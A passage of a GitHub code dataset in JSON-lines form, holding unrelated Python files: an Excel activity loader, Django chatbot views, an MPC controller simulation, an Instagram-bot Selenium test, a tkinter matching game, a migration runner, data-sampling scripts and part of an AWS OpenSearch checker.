cell_postion\r\n\r\n#returns the value of contractor name from excel_act_tble_config.ini\r\ndef getContractorNameCellPosition(config, pos):\r\n keyVal = 'activities' + str(pos)\r\n cell_postion = config[keyVal]['activities_contractor_name']\r\n return cell_postion\r\n\r\n#returns the value of planned start date from excel_act_tble_config.ini\r\ndef getPlannedStartCellPosition(config, pos):\r\n keyVal = 'activities' + str(pos)\r\n cell_postion = config[keyVal]['activities_planned_start']\r\n return cell_postion\r\n\r\n#returns the value of planned end date from excel_act_tble_config.ini\r\ndef getPlannedEndCellPosition(config, pos):\r\n keyVal = 'activities' + str(pos)\r\n cell_postion = config[keyVal]['activities_planned_end']\r\n return cell_postion\r\n\r\n#function to get output file config, name for writing out the results csv file\r\n#def outfile(config):\r\n# return config['outputFileName']['fname']\r\n\r\n#function to get output directory file name for writing out the results csv file\r\n#def outfileDir(config):\r\n# return config['outputFileName']['fdirectory']\r\n\r\n# returns incremented value of a 
variable\r\ndef incrementfnc(tval):\r\n tval = tval + 1\r\n return tval\r\n\r\ndef prResultData(rList):\r\n print(rList)\r\n\r\n# Function to call the activities table and insert activity_name, unit_name etc into activities table\r\ndef updateBaseLineActivities(dbh, db_conn, final_list):\r\n # SQL for inserting data into public.activities table\r\n for i in range(0, len(final_list)):\r\n activityName = str(final_list[i][0])\r\n unit_name = str(final_list[i][1])\r\n contractor_name = final_list[i][2]\r\n # convert the string to yymmdd to be inserted\r\n planned_start = datetime.datetime.strptime(final_list[i][3],\"%m%d%Y\").date().strftime('%Y%m%d')\r\n planned_end = datetime.datetime.strptime(final_list[i][4], \"%m%d%Y\").date().strftime('%Y%m%d')\r\n project_name = final_list[i][5]\r\n execSQL = \"INSERT INTO temp.activities (name, unit_name, contractor_name, planned_start, planned_end, project_name) values (%s,%s,%s,%s,%s,%s);\"\r\n execData = (activityName, unit_name, contractor_name, planned_start, planned_end,project_name)\r\n dbh.executeQueryWithData(db_conn, execSQL, execData)\r\n\r\n### ---------End of Functions -----\r\n\r\n\r\ndef processBaselineActivities(act_wb, eut, dbh, config):\r\n ## Open db connection\r\n db_conn = dbh.getConn()\r\n\r\n print('Function: processBaselineActivities........')\r\n\r\n # getting the active worksheet\r\n wrksheet_names = act_wb.sheet_names()\r\n\r\n #get the total activities in the sheet\r\n tot_activity = config['TotalActivities']['total_activities']\r\n\r\n # initializing a list\r\n Final_List = list()\r\n\r\n # This for loop is to go through the excel sheet\r\n # Take key values of excel_act_tble_config.ini as arguments\r\n # search each cell to get the values\r\n #logging.debug('Entering into For loop to get values from excel sheet')\r\n print('Entering into For loop to get values from excel sheet')\r\n\r\n # get the active sheet\r\n activityName_active_sheet = wrksheet_names[0]\r\n # pass the active sheet name\r\n sheet = act_wb.sheet_by_index(0)\r\n L1 = []\r\n\r\n #-----------------------------------------\r\n # Getting the project Name from the sheet\r\n #------------------------------------------\r\n projectName_cell = getProjectName(config)\r\n # reading the cell address and getting the value in rows,columns\r\n projectName_position = eut.getRowColumn(projectName_cell)\r\n # getting the project name\r\n projectName = sheet.cell_value(projectName_position[0],projectName_position[1])\r\n\r\n for i in range(0,int(tot_activity)):\r\n #getting activity name\r\n ancp = getActivityNameCellPosition(config, i)\r\n acrc = eut.getRowColumn(ancp)\r\n L_activityName_cell_value = sheet.cell_value(acrc[0],acrc[1])\r\n\r\n #getting unit name\r\n auncp = getUnitNameCellPosition(config, i)\r\n aunrc = eut.getRowColumn(auncp)\r\n L_activities_unit_name_cell_value = sheet.cell_value(aunrc[0],aunrc[1])\r\n\r\n #getting the contractor name\r\n acncp = getContractorNameCellPosition(config, i)\r\n acnrc = eut.getRowColumn(acncp)\r\n L_activities_contractor_name_cell_value = sheet.cell_value(acnrc[0],acnrc[1])\r\n\r\n #getting the planned start date\r\n apscp = getPlannedStartCellPosition(config, i)\r\n apscrc = eut.getRowColumn(apscp)\r\n a1 = sheet.cell_value(apscrc[0],apscrc[1])\r\n a1_as_datetime = datetime.datetime(*xlrd.xldate_as_tuple(a1, act_wb.datemode))\r\n L_activities_planned_start_date = convertDate(a1_as_datetime).strftime('%m%d%Y')\r\n\r\n #getting the planned end date\r\n apecp = getPlannedEndCellPosition(config, i)\r\n apecrc = 
eut.getRowColumn(apecp)\r\n a1 = sheet.cell_value(apecrc[0],apecrc[1])\r\n a1_as_datetime = datetime.datetime(*xlrd.xldate_as_tuple(a1, act_wb.datemode))\r\n L_activities_planned_end_date = convertDate(a1_as_datetime).strftime('%m%d%Y')\r\n\r\n # Depending on the number of activities, the if loop will load the list\r\n j = i - 1\r\n L1.insert(j,L_activityName_cell_value)\r\n L1.insert(incrementfnc(j+1),L_activities_unit_name_cell_value)\r\n L1.insert(incrementfnc(j+2),L_activities_contractor_name_cell_value)\r\n L1.insert(incrementfnc(j+3),L_activities_planned_start_date)\r\n L1.insert(incrementfnc(j+4),L_activities_planned_end_date)\r\n L1.insert(incrementfnc(j+5), projectName)\r\n\r\n final_list = [L1]\r\n print(final_list)\r\n\r\n # output file\r\n # output_FileName1 = outfileDir(config ) + str(outfile(config))\r\n # output_FileName = output_FileName1.replace(\"'\",\"\")\r\n # Now pass the list along with filename to the writer python file\r\n #eut.writeCSVFile(output_FileName,final_list)\r\n\r\n updateBaseLineActivities(dbh, db_conn, final_list)\r\n L1 = []\r\n\r\n # Now update the public.activities table\r\n stProcedure = \"SELECT update_baseline_activities()\"\r\n dbh.executeQuery(db_conn,stProcedure)\r\n db_conn.close()\r\n\r\n # close or delete all the open instances, Lists, and connections\r\n # clear all the variables from memory\r\n del final_list\r\n del L1\r\n\r\n\r\n# --- End of Program ---","repo_name":"lakshmidamodara/cct-dataloader","sub_path":"baseline_activities.py","file_name":"baseline_activities.py","file_ext":"py","file_size_in_byte":7955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33360322276","text":"from django.shortcuts import render\nfrom .models import Enquiry\nfrom bot.chat import get_response\nimport json\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n# Create your views here.\n\n\ndef index(request):\n if request.method == \"POST\":\n first_name = request.POST['firstname']\n last_name = request.POST['lastname']\n email_address = request.POST['email']\n services_rendered = request.POST['services']\n message = request.POST['message']\n enquiry = Enquiry.objects.create(firstname= request.POST['firstname'],lastname=request.POST['lastname'],\n email=request.POST['email'],services=request.POST['services'],message=request.POST['message'])\n enquiry.save()\n\n\n\n return render(request,\"index.html\")\n\n\n@csrf_exempt\ndef botts(request):\n data = json.loads(request.body)\n message = data['message']\n response = get_response(message)\n messg = {\"answer\": response}\n re = messg[\"answer\"]\n # message = {\"answer\": response}\n # return jsonify(message)\n\n\n\n return JsonResponse({\"answer\": re })\n\n\n","repo_name":"Zeecoworld/portfolio-site-ai-chatbot","sub_path":"zeecoapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"16107410178","text":"from NonlinearController.model_utils import *\nfrom NonlinearController.systems import UnbalancedDisc\nfrom matplotlib import pyplot as plt\nimport deepSI\nfrom casadi import *\nimport torch\nimport random\nimport time\n\n################## Utility functions #######################\n\ndef randomLevelReference(Nsim, nt_range, level_range):\n x_reference_list = np.array([])\n Nsim_remaining = Nsim\n while True:\n Nsim_steps = random.randint(nt_range[0],nt_range[1])\n 
Nsim_remaining = Nsim_remaining - Nsim_steps\n x_reference_list = np.hstack((x_reference_list, np.ones(Nsim_steps)*random.randint(level_range[0]*10,level_range[1]*10)/10))\n\n if Nsim_remaining <= 0:\n x_reference_list = x_reference_list[:Nsim]\n break\n return x_reference_list\n\ndef setPointInput(y_ref):\n g = 9.80155078791343\n J = 0.000244210523960356\n Km = 10.5081817407479\n I = 0.0410772235841364\n M = 0.0761844495320390\n tau = 0.397973147009910\n\n return (tau * M * g * I)/(Km * J) * np.sin(y_ref)\n\n################## System #######################\ndt = 0.1\nsystem = UnbalancedDisc(dt=dt)\nsystem.reset_state()\n\n################## MPC variable specification #######################\nmodel = deepSI.load_system(\"NonlinearController/trained_models/unbalanced/ObserverUnbalancedDisk_dt01_nab_4_SNR_30_e250\")\n# model = deepSI.load_system(\"NonlinearController/trained_models/unbalanced/ud_test_4\")\nNc=5; nr_sim_steps = 100\n\nQ = 100; R = 1\n\nw_min = -4.0; w_max = 4.0\nq_min = [-1.2]; q_max = [1.2]\nw0 = 0; q0 = 0\n\na = 0.9; reference = np.hstack((np.ones(20)*a,np.ones(20)*-a,np.ones(20)*a/2,np.ones(20)*-a/2,np.ones(40)*0))\nreference = np.load(\"references/multisine.npy\")\n\n# reference = randomLevelReference(nr_sim_steps+Nc, [25,30], [-1,1])\n# reference = deepSI.deepSI.exp_design.multisine(nr_sim_steps+Nc+1, pmax=20, n_crest_factor_optim=20)/2.0\n# reference = np.load(\"NonlinearController/references/setPoints.npy\")\n# reference = np.sin(np.arange(0,nr_sim_steps+Nc)/np.pi*3.5)*1\n# x_reference_list = 1*np.load(\"NonlinearController/references/randomLevelTime25_30Range-1_1Nsim500.npy\")\n# reference = x_reference_list[1,:]\n\n################## Offline Computation #######################\nnx = model.nx\nx = MX.sym(\"x\",nx,1)\nnu = model.nu if model.nu is not None else 1\nu = MX.sym(\"u\",nu,1)\nny = model.ny if model.ny is not None else 1\n\n# convert torch nn to casadi function\nx_rhs = CasADi_Fn(model, x, u)\ny_rhs = CasADi_Hn(model, x)\n\nf = Function('f', [x, u], [x_rhs])\nh = Function('h', [x], [y_rhs])\n\n# normalize initial input and output\nnorm = model.norm\nu0 = norm_input(w0, norm)\ny0 = norm_output(q0, norm)\n\nu_min = norm_input(w_min, norm); u_max = norm_input(w_max, norm)\ny_min = norm_output(q_min, norm); y_max = norm_output(q_max, norm)\n\n# initialize observer history input and output\nnb = model.nb\nuhist = torch.ones((1,nb))*u0\nna = model.na\nyhist = torch.ones((1,na+1))*y0\n\n# define initial predicted states and inputs\nX0 = np.tile(model.encoder(uhist,yhist).detach().numpy().T,Nc+1)\nU0 = np.ones((Nc)*nu)[np.newaxis]*u0\nY0 = np.ones((Nc)*ny)[np.newaxis]*y0\n\n# define opti stack\nopti = Opti()\n\nstates = opti.variable(nx, Nc+1)\ncontrols = opti.variable(nu, Nc)\noutputs = opti.variable(ny, Nc)\n\nx_initial = opti.parameter(nx, 1)\ny_ref = opti.parameter(ny, Nc)\nu_ref = opti.parameter(nu, Nc)\n\nopti.subject_to(opti.bounded(y_min,outputs,y_max))\nopti.subject_to(opti.bounded(u_min,controls,u_max))\nopti.subject_to(states[:,0] == x_initial)\n\nopti.set_initial(states, X0)\nopti.set_initial(controls, U0)\nopti.set_initial(outputs, Y0)\n\nopti.set_value(x_initial,X0[:,0])\n# opti.set_value(y_ref, reference[:Nc])\n\nopts = {'print_time' : 0, 'ipopt': {'print_level': 0}}\nopti.solver(\"ipopt\",opts)\n\nobjective = 0\nfor i in np.arange(Nc):\n opti.subject_to(states[:,i+1] == f(states[:,i], controls[:,i]))\n opti.subject_to(outputs[:,i] == h(states[:,i+1]))\n objective = (objective + \n mtimes(mtimes((outputs[:,i] - y_ref[:,i]).T,Q),(outputs[:,i] - 
y_ref[:,i])) +\n mtimes(mtimes((controls[:,i] - u_ref[:,i]).T,R),(controls[:,i] - u_ref[:,i])))\n\nopti.minimize(objective)\n\n################## Logging #######################\nlog_q = np.zeros((ny,nr_sim_steps))\nlog_w = np.zeros((nu,nr_sim_steps))\n\nlog_comp_t = np.zeros((2, nr_sim_steps))\n\n################## Online Computation #######################\n\n#++++++++++++++++++ start simulation step +++++++++++++++++++++++\nfor k in range(nr_sim_steps):\n component_start = time.time()\n \n opti.set_value(y_ref, norm_output(reference[k:k+Nc], norm))\n opti.set_value(u_ref, norm_input(setPointInput(reference[k:k+Nc]), norm))\n\n log_comp_t[0, k] = log_comp_t[0, k] + time.time() - component_start\n component_start = time.time()\n\n sol = opti.solve()\n\n log_comp_t[1, k] = log_comp_t[1, k] + time.time() - component_start\n component_start = time.time()\n\n U0[0,:] = sol.value(controls)\n X0[:,:] = sol.value(states)\n Y0[:,:] = sol.value(outputs)\n\n # determine input from optimal velocity input\n u0 = U0[:,0]\n # denormalize input\n w0 = denorm_input(u0, norm)\n # measure output then apply input\n system.x = system.f(system.x, w0[0])\n q1 = system.h(system.x, w0[0])\n # normalize output\n y1 = norm_output(q1, norm)\n\n # shift history input and output for encoder\n for j in range(nb-1):\n uhist[0,j] = uhist[0,j+1]\n uhist[0,nb-1] = torch.Tensor(u0)\n for j in range(na):\n yhist[0,j] = yhist[0,j+1]\n yhist[0,na] = torch.Tensor([y1])\n # predict state with encoder\n x1 = model.encoder(uhist,yhist)\n\n # shift predicted states, input, and output one time step k\n X0[:, :-1] = X0[:, 1:]; X0[:, -1:] = X0[:, -2:-1]; X0[:, :1] = x1.detach().numpy().T\n U0[:, :-1] = U0[:, 1:]; U0[:, -1:] = U0[:, -2:-1]#; U0[:, :1] = u0\n Y0[:, :-1] = Y0[:, 1:]; Y0[:, -1:] = Y0[:, -2:-1]; Y0[:, :1] = y1\n\n opti.set_initial(states, X0)\n opti.set_initial(controls, U0)\n opti.set_initial(outputs, Y0)\n opti.set_value(x_initial,X0[:,0])\n\n # log system signals\n log_q[:,k] = q1\n log_w[:,k] = w0\n\n log_comp_t[0, k] = log_comp_t[0, k] + time.time() - component_start\n\n # print progress\n # print(\"Sim step: \" + str(k))\n \n#++++++++++++++++++ end simulation step +++++++++++++++++++++++\n\nfig1 = plt.figure(figsize=[12, 8])\n\nplt.subplot(1,2,1)\nplt.plot(np.arange(nr_sim_steps)*dt, log_w[0,:], label='input')\nplt.plot(np.arange(nr_sim_steps)*dt, np.ones(nr_sim_steps)*w_max, 'r-.')#, label='max')\nplt.plot(np.arange(nr_sim_steps)*dt, np.ones(nr_sim_steps)*w_min, 'r-.')#, label='min')\n# plt.xlabel(\"time [s]\")\nplt.ylabel(\"voltage [V]\")\nplt.grid()\nplt.legend(loc='upper right')\n\nplt.subplot(1,2,2)\nplt.plot(np.arange(nr_sim_steps)*dt, log_q[0,:], label='output')\nplt.plot(np.arange(nr_sim_steps)*dt, reference[:nr_sim_steps], '--', label='reference')\nplt.plot(np.arange(nr_sim_steps)*dt, np.ones(nr_sim_steps)*q_max[0], 'r-.')#, label='max')\nplt.plot(np.arange(nr_sim_steps)*dt, np.ones(nr_sim_steps)*q_min[0], 'r-.')#, label='min')\n# plt.xlabel(\"time [s]\")\nplt.ylabel(\"angle [rad]\")\nplt.grid()\nplt.legend(loc='upper right')\n\nplt.show()\n\nCT_iters = np.split(log_comp_t, nr_sim_steps, axis=1)\nCT = np.sum(CT_iters[0], axis=1)\n\nremove_start = 0\nS_iter = np.zeros(nr_sim_steps-remove_start)\nT_iter = np.zeros(nr_sim_steps-remove_start)\n\nfor i in range(remove_start,nr_sim_steps):\n CT = np.sum(CT_iters[i], axis=1)\n S_iter[i-remove_start] = CT[1]\n T_iter[i-remove_start] = np.sum(CT)\n\nSorted = np.sort(T_iter)\n# np.max(T_iter)*1000, np.mean(Sorted[int(nr_sim_steps*0.95):])*1000, np.mean(T_iter)*1000, 
np.std(T_iter)*1000, np.mean(S_iter)*1000 #in ms\nTimes = [np.max(T_iter)*1000, np.mean(T_iter)*1000, np.std(T_iter)*1000, np.mean(S_iter)*1000] #in ms\nprint(Times)\n\n# np.save(\"experiments/ud_nmpc_encoder_levels_u.npy\", log_w)\n# np.save(\"experiments/ud_nmpc_encoder_levels_q.npy\", log_q)\n\nnp.save(\"experiments/ud_nmpc_encoder_sinus_u.npy\", log_w)\nnp.save(\"experiments/ud_nmpc_encoder_sinus_q.npy\", log_q)","repo_name":"Mixxxxx358/NonlinearController","sub_path":"encoder_NMPC_UnbalancedDisc.py","file_name":"encoder_NMPC_UnbalancedDisc.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"26954463957","text":"import os\n\nfrom datetime import datetime, timedelta\nfrom selenium.webdriver.common.by import By\nfrom time import sleep\n\nfrom instabot.post import Post\nfrom instabot.poster import Poster\n\ndef test_integration_post_multiple_times():\n # Given.\n poster = Poster(username=os.getenv('TEST_INSTAGRAM_USERNAME'), password=os.getenv('TEST_INSTAGRAM_PASSWORD'), account_name=os.getenv('TEST_INSTAGRAM_ACCOUNT_NAME'))\n post1 = Post(filepath=os.getcwd() + '/tests/img/valid_test_img.png', description=\"This is a test description.\", scheduled_time=datetime.now() + timedelta(days=1))\n post2 = Post(filepath=os.getcwd() + '/tests/img/valid_test_img.png', description=\"This is a test description.\", scheduled_time=datetime.now() + timedelta(days=2))\n\n # When.\n url1 = poster.post(post1)\n url2 = poster.post(post2)\n\n # Then.\n poster._driver.get(url1)\n sleep(2)\n post_description1 = poster._driver.find_element(By.XPATH, f\"//h1[contains(text(), '{post1.description}')]\").text\n post_image_information1 = poster._driver.find_element(By.XPATH, f\"//img[contains(@alt, '{datetime.now().strftime('%b %d, %Y')}')]\").get_attribute(\"alt\")\n \n poster._driver.get(url2)\n sleep(2)\n post_description2 = poster._driver.find_element(By.XPATH, f\"//h1[contains(text(), '{post1.description}')]\").text\n post_image_information2 = poster._driver.find_element(By.XPATH, f\"//img[contains(@alt, '{datetime.now().strftime('%b %d, %Y')}')]\").get_attribute(\"alt\")\n\n poster._delete_post(url1)\n poster._delete_post(url2)\n poster._driver.quit()\n\n assert post_description1 == post1.description\n assert post_image_information1 == f\"Photo by {poster._account_name} on {datetime.now().strftime('%b %d, %Y')}.\"\n assert post_description2 == post2.description\n assert post_image_information2 == f\"Photo by {poster._account_name} on {datetime.now().strftime('%b %d, %Y')}.\"","repo_name":"Ssoppa/InstaBot","sub_path":"tests/integration/test_integration_poster.py","file_name":"test_integration_poster.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39314373737","text":"\nimport random\nimport time\nfrom tkinter import Tk , Button , DISABLED\n\n\ndef show_symbol(x,y):\n global first\n global previousx , previousy\n buttons[x,y]['text'] = button_symbols[x,y]\n buttons[x,y].update_idletasks()\n\n if first:\n previousx = x\n previousy = y\n first = False\n \n elif previousx != x or previousy != y:\n if buttons[previousx,previousy]['text'] != buttons[x,y]['text']:\n time.sleep(1.1)\n buttons[previousx,previousy]['text'] = ' '\n buttons[x,y]['text'] = ' '\n else:\n buttons[previousx,previousy]['command'] = DISABLED\n buttons[x,y]['command'] = DISABLED\n first = True\n\nwin = Tk()\nwin.title('Match the 
numbers')\nwin.resizable(width=False , height=False)\nfirst = True\npreviousx = 0\npreviousy = 0\nbuttons = { }\nbutton_symbols = { }\nsymbols = [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\"]\n\nrandom.shuffle(symbols)\n\nfor x in range(6):\n for y in range(4):\n button = Button(command = lambda x=x , y=y: show_symbol(x,y) , width = 8, height = 5, activebackground = 'white', fg = 'red', font = 'helv36' , justify = 'center', activeforeground = 'black', bg = 'lightblue', bd = 4)\n button.grid(column = x , row = y)\n buttons[x,y] = button\n button_symbols[x,y] = symbols.pop()\n\nwin.mainloop()\n#Hastis's emoji match maker","repo_name":"HastiSutaria/match_the_numbers","sub_path":"match_numbers.py","file_name":"match_numbers.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2684442077","text":"import datetime\nimport json\nimport logging\nimport os\nfrom importlib import util\nimport pytz\n\n\nlogging.basicConfig(\n format='[%(asctime)s] (%(levelname)s) %(name)s: %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.DEBUG)\n\n_logger = logging.getLogger(\"Migrator\")\n\n\ndef now():\n \"\"\"\n Returns UTC timestamp with time zone\n \"\"\"\n return pytz.UTC.localize(datetime.datetime.utcnow())\n\n\ndef now_br():\n \"\"\"\n Returns America - São Paulo timestamp with time zone\n \"\"\"\n return now().astimezone(pytz.timezone(\"America/Sao_Paulo\"))\n\n\ndef write_json(data, file_path):\n \"\"\"\n Write data to json.\n :data: json structured data\n :file_path: file path string description\n \"\"\"\n with open(file_path, 'w') as file:\n json.dump(data, file, indent=4)\n\n\ndef migrate(environment=os.getenv('ENVIRONMENT')):\n \"\"\"\n If migrations at migrations folder not applied, apply them.\n \"\"\"\n\n # Paths\n DIR_PATH = os.path.dirname(__file__)\n MIGRATIONS_PATH = os.path.join(DIR_PATH, 'migrations')\n MIGRATIONS_EXECUTION_PATH = os.path.join(\n DIR_PATH, 'migrations', 'migrations_execution.json')\n\n # Verify already applied migrations\n with open(MIGRATIONS_EXECUTION_PATH) as json_file:\n data = json.load(json_file)\n\n temp = data['executed']\n\n migrated_list = (\n [migration_done.get(\"name\", None)for migration_done in temp\n if environment in migration_done.get(\"environment\", None)]\n )\n\n # Look for migrations at migrations folder\n migrations = sorted(\n filter(\n lambda file_name: file_name.endswith('.py'),\n os.listdir(MIGRATIONS_PATH)\n )\n )\n\n # Apply migrations found\n for migration in migrations:\n\n # If migration already applied skip\n if migration in migrated_list:\n _logger.warning('Migration %s already applied', migration)\n continue\n\n # Import migration\n migration_path = os.path.join(\n os.path.dirname(__file__), 'migrations', migration)\n spec = util.spec_from_file_location(migration, migration_path)\n migration_import = util.module_from_spec(spec)\n spec.loader.exec_module(migration_import)\n\n # Apply migrations\n try:\n migration_import.apply()\n _logger.info('migration %s executed', migration)\n\n migrated = {\n \"name\": migration,\n \"date\": str(now_br()),\n \"environment\": environment\n }\n\n temp.append(migrated)\n\n except Exception as error:\n _logger.error('migration failed. 
Error: %s', error)\n\n if environment != 'testing':\n write_json(data, MIGRATIONS_EXECUTION_PATH)\n\n\nif __name__ == '__main__':\n migrate()\n","repo_name":"dmenezesgabriel/tick_track","sub_path":"tick_track/database/migrations.py","file_name":"migrations.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10380104202","text":"import torch\nimport random\nfrom tqdm import tqdm\n\ntrain = torch.load('data/mnist/MNIST/processed/training.pt')\n\nN = 60000\n\nm = [[] for _ in range(N)]\nm1 = []\n\nfor i in tqdm(range(100)):\n for _ in range(N):\n a = random.randint(0, 59999)\n m[a].append(i)\n\n\nfor i in range(N):\n b = ','.join([str(x) for x in m[i]])\n m1.append(b)\n\nd = (train[0], train[1], m1)\n\ntorch.save(d, 'training_rf.pt')\n","repo_name":"walker1001/Thesis","sub_path":"create_bagging.py","file_name":"create_bagging.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74936307477","text":"import os\nimport pandas as pd\nfrom pathlib import Path\nimport csv\nimport datetime\nfrom datetime import date\n\nos.chdir(str(Path.home()))\n# user input for where images are stored. 'copy path' from file explorer\nproject_directory = 'Documents/Beetle ID Trial'\n# Change working directory.\nos.chdir(project_directory)\n\ndirectory = str('fingerprints')\n\nimages_list = os.listdir(directory) # List and print all files in directory.\n\n# read in simulated context for each image\nfocal_df = pd.read_csv('data/simulated_wild_data.csv')\nquery_df = pd.read_csv('data/simulated_wild_released_data.csv')\n\nsize_offset = float(0.05) # variable defining how much uncertainty in individual size i will accept for comparisons.\n\nn = 35\n\ndef get_list_focal_examples(images_list):\n # initialize list to accept photo examples of focal individual\n list_focal_examples = []\n list_focal = focal_df.iloc[:, 0] # split off first column of within-week beetle names as list\n\n # for every unique within-week name, find all photo examples of that individual.\n for i in range(0,len(list_focal)):\n matching = [s for s in images_list if s.split(\"_\")[0] == list_focal[i].split(\"_\")[0] and s.split(\"_\")[1] == list_focal[i].split(\"_\")[1]]\n list_focal_examples.append(matching)\n\n return list_focal, list_focal_examples\n\ndef get_list_test(focal_df, query_df, size_offset):\n list_test = []\n # for every focal individual, find all potential pairwise-comparisons that make sense with respect to\n # body size, date of capture/photo and sex\n for i in range(0,len(focal_df)):\n refined = query_df[((query_df[\"size\"].between(focal_df.at[i, \"size\"] - size_offset,\n focal_df.at[i, \"size\"] + size_offset)) | (\n query_df[\"size\"].isnull())) &\n ((query_df[\"datef\"] < focal_df.at[i, \"datef\"])) &\n ((query_df[\"sex\"] == focal_df.at[i, \"sex\"]) | (query_df[\"sex\"].isnull())) &\n (query_df[\"focal\"] != focal_df.at[i, \"focal\"])]\n # insert extra filter when data is further refined. 
Amend date filtering on real data to < than, rather than <=.\n #df[\"sex\"] == df.at[i,\"sex\"]\n list_test.append(refined.iloc[:, 0])\n\n return list_test\n\ndef get_list_test_examples(list_test, images_list):\n list_test_examples = []\n # for every unique within-week name of potential matches to focal, find all photo examples of those individuals.\n for sublist in list_test:\n sublist = sublist.tolist()\n temp = []\n for i in sublist:\n matching = [s for s in images_list if str(i) in s]\n temp.append(matching)\n flat_list = [item for sublist in temp for item in sublist]\n list_test_examples.append(flat_list)\n\n for i in range(len(list_test_examples)):\n if not list_test_examples[i]:\n list_test_examples[i] = [\"No matching\"]\n\n return list_test_examples\n\ndef generate_lists(images_list, focal_df, query_df, size_offset):\n list_focal, list_focal_examples = get_list_focal_examples(images_list)\n list_test = get_list_test(focal_df, query_df, size_offset)\n list_test_examples = get_list_test_examples(list_test, images_list)\n\n return list_focal_examples, list_test_examples\n\ndef product_of_matches(nested_list_1, nested_list_2, i):\n for item_1 in nested_list_1[i]:\n for item_2 in nested_list_2[i]:\n pairs.append([item_1, item_2])\n return\n\nstart_time = datetime.datetime.now()\nlist_focal_examples, list_test_examples = generate_lists(images_list, focal_df, query_df, size_offset)\n\npairs = [['focal_image', 'test_image']]\nfor i in range(len(list_focal_examples)):\n product_of_matches(list_focal_examples, list_test_examples, i)\n\nwith open('data/wild_pairwise_list.csv', 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerows(pairs)\n\nprocessing_time = datetime.datetime.now() - start_time\n# print the time taken to process all images\nprint(\"Time taken: \", processing_time)\n\nwith open('logs/processing_times.txt', 'a') as f:\n f.write('\\n Generating pairwise comparisons - {0} matches processed in {1} minutes. 
{2} \\n'.format(\n str(len(pairs) - 1), str(processing_time), date.today()))","repo_name":"KynanDelaney/Beetle_ID","sub_path":"Backend/generating_pairwise_lists.py","file_name":"generating_pairwise_lists.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"75109349398","text":"import time\nimport datetime\n\nfrom utils.Config import Config\nfrom utils.Tools import _pr\nfrom utils.Tools import _warn\nfrom utils.Tools import aws_parseInstanceFamily\nfrom utils.Policy import Policy\nfrom services.Evaluator import Evaluator\n\nclass OpensearchCommon(Evaluator):\n NODES_LIMIT = 200\n \n def __init__(self, bConfig, domain, osClient, cwClient):\n self.results = {}\n self.clientConfig = bConfig\n self.domain = domain\n self.osClient = osClient\n self.cwClient = cwClient\n \n self.attribute = self.osClient.describe_domain(DomainName=self.domain)\n self.cluster_config = self.attribute[\"DomainStatus\"][\"ClusterConfig\"]\n self.domain_config = self.osClient.describe_domain_config(DomainName=self.domain)\n\n self.aos_versions = self.osClient.list_versions(MaxResults=11)\n self.latest_version = self.aos_versions[\"Versions\"][0]\n self.engine_version = self.attribute[\"DomainStatus\"][\"EngineVersion\"]\n self.instance_type_details = self.osClient.list_instance_type_details(\n EngineVersion=self.engine_version\n )\n \n # Create a list of OpenSearch instance types.\n self.instance_type_list = []\n for idx, details in enumerate(self.instance_type_details[\"InstanceTypeDetails\"]):\n self.instance_type_list.append(details[\"InstanceType\"])\n \n # Initialize the evaluator.\n self.init()\n \n def getCloudWatchData(self, metric, statistics=[\"Average\"], time_ago=300, period=300):\n cw_client = self.cwClient\n \n sts_info = Config.get(\"stsInfo\")\n client_id = sts_info[\"Account\"]\n\n dimensions = [\n {\"Name\": \"ClientId\", \"Value\": client_id},\n {\"Name\": \"DomainName\", \"Value\": self.domain},\n ]\n\n stats = cw_client.get_metric_statistics(\n Dimensions=dimensions,\n Namespace=\"AWS/ES\",\n MetricName=metric,\n StartTime=int(time.time())-time_ago,\n EndTime=int(time.time()),\n Period=period,\n Statistics=statistics\n )\n\n return stats \n \n def _checkMasterNodes(self):\n enabled = self.cluster_config[\"DedicatedMasterEnabled\"]\n if enabled:\n nodes = self.cluster_config[\"DedicatedMasterCount\"]\n self.results[\"DedicatedMasterNodes\"] = [-1, \"No dedicated master nodes\"]\n \n if nodes < 3:\n self.results[\"DedicatedMasterNodes\"] = [-1, \"Insufficient dedicated master nodes\"]\n return\n if nodes % 2 == 0:\n self.results[\"DedicatedMasterNodes\"] = [-1, \"Wrong number of dedicated master nodes\"]\n return\n self.results[\"DedicatedMasterNodes\"] = [1, \"Sufficient dedicated master nodes\"]\n \n def _checkAvailabilityZones(self):\n enabled = self.cluster_config[\"ZoneAwarenessEnabled\"]\n self.results[\"AvailabilityZones\"] = [-1, \"Multi-AZ not enabled\"]\n if enabled:\n self.results[\"AvailabilityZones\"] = [1, \"Multi-AZ enabled\"]\n\n def _checkServiceSoftwareVersion(self):\n if 'DomainStatus' in self.attribute:\n if 'ServiceSoftwareOptions' in self.attribute['DomainStatus']:\n if 'UpdateAvailable' in self.attribute['DomainStatus']['ServiceSoftwareOptions']:\n self.results[\"ServiceSoftwareVersion\"] = [-1, \"Upgrade to latest version\"]\n\n def _checkEngineVersion(self):\n if self.engine_version != self.latest_version:\n self.results[\"EngineVersion\"] = [-1, \"Later Engine Versions 
